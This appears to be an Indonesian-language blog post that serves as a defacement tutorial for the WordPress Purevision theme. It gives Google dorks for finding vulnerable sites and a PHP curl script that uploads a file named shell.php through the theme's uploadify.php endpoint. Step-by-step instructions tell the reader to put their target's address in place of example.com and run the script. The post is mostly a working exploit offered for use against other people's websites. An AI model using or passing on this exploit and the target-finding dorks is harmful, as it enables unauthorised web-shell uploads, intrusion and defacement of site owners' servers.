Exploit title: Wordpress Themes Purevision File Upload Vulnerability
Dork: inurl:/wp-content/themes/purevision
inurl:/wp-content/themes/purevision intext:index of
Index of /wp-content/themes/purevision/
Bahan-bahan:
- Xampp : Download
Exploit:
<?php
$uploadfile="shell.php";
$ch = curl_init("http://example.com/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/themes/purevision/scripts/admin/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Tutorial:
- Buka Xampp, start Apace dan MySql
- Edit Exploit di atas,
example.com ganti dengan link target mu
- Simpan Exploit di C: > xampp > php dengan format .php
- Run exploit tadi dengan cmd, perintahnya php exploit.php enter
Jika keluar angka 1 tandanya exploit sukses atau target vuln
Tag: tutorial deface, cara deface, deface purevision, themes purevision, exploits, purevision, deface dengan purevision, step by step deface
0 Komentar